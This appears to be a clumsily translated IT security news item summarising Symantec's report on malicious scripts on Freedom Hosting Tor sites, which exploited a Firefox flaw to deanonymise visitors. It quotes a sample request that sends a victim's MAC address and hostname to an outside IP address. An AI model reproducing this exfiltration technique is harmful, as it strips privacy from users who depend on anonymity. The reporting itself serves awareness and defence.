Symantec reported the detection of an attack on a popular hosting “Freedom Hosting”, which provides anonymous hosting service through a network of Tor. On the page of the service have been detected malicious scripts that allow attackers to intercept user data network Tor. As a result, questioned the anonymity of the hosting center – in fact with the help of malicious programs can track the user’s location.
August 4 at the sites hosted on hosting Freedom Hosting, allows access through a network of Tor, were found malicious scripts. Discovered scripts use the vulnerability, found in the browser Firefox, which has already been fixed in Firefox 22 and Firefox 17.0.7 ESR (Extended Support Release). Most likely, this vulnerability has been chosen because it set to work with a network of Tor Browser Bundle (TBB) is based on the Firefox ESR 17. Symantec products are defined these scripts as Trojan.Malscript! Html.
In the event of a successful attack MAC-address of the network card and the local host name of the infected computer sent to the IP-address 65.222.202.54 – that is, fall into the wrong hands. Here is an example sends the data in this way, where the host – the name of the local computer and the cookie ID – its MAC-address:
GET / 05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1
Host: PXE306141
Cookie: ID = 0019B909D908
Connection: keep-alive
Accept: * / *
Accept-Encoding: gzip
In addition, as a result of a malicious site on the computer is the unique cookie-file, and with his help, and using MAC-address and name of the local host, attackers can determine the location of an individual computer targeted by the attack. The introduction of such methods would allow law enforcement agencies to determine the location of the system by keeping track of who was sold to one or the other network card. There is much speculation about the identity and motives of the attacker or attackers behind this attack, but at this time does not prove anything is possible.
Although the Tor network and was designed to protect the personal data of users by hiding their location and Internet activity from the various systems of traffic analysis and network monitoring, this attack shows that Tor users can still be traced, they say in Symantec.
Source: http://www.symantec.com/connect/blogs/tor-anonymity-comes-under-attack
Filed under: IT Security News
